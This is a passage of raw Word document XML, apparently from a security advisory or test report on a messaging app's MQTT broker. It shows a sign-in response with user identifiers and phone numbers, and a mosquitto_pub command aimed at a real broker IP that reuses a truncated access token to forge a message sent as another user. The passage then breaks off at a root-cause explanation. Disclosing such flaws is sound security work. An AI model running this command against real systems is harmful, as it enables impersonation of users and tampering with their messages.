          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"e965dd5f-8df8-4478-b51c-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>f3ac82fac134"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"+12064512559@bridge fy.app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Oscar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"alias"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"oscarm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"avatar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"7"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"platform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"IOS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"subscribe "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/general"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/+/e965dd5f-8df8-4478-b51c-f3ac82fac134/#"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/clients/+/status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"p ublish"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/e965dd5f-8df8-4478-b51c-f3ac82fac134/+/#"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/clients/e965dd5f-8df8-4478-b 51c-f3ac82fac134/status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionApp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1.0.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionSdk"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionOs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"13.5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"pho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>neVerified"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"identityVerified"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"blocked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"User signed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>successfully."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>publish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>broker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mosquitto_pub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3.131.221.30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"e965dd5f-8df8-4478-b51c-f3ac82fac134"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"eyJhbGciOiJSUzI1[...]" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bf/e965dd5f-8df8-4478-b51c-f3ac82fac134/58ac0b67-bb4f-459e-9b82-4b67c81abf3c" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"id":"e480eb8c-7bdd-41ed-b9fe-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4285d4288d00","message":"{\"payload\":{\"createdOn\":16 72417105535,\"senderId\":\"e965dd5f-8df8-4478-b51c-f3ac82fac134\",\"message\":\"from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+12012987481\",\"receiverNickname\":\"userand\",\"receiverAvatar\":1,\"receiverName\":\ "any\",\"senderNickname\":\"oscarm\",\"receiverId\":\"58ac0b67-bb4f-459e-9b82-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4b67c81ab f3c\",\"dateSent\":1672417105535,\"senderName\":\"any\",\"status\":2,\"senderAvatar\":7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},\"uuid\":\"e480eb8c-7bdd-44ed-b9fe-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4285d4288d00\"}","timestamp":1672417105535}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
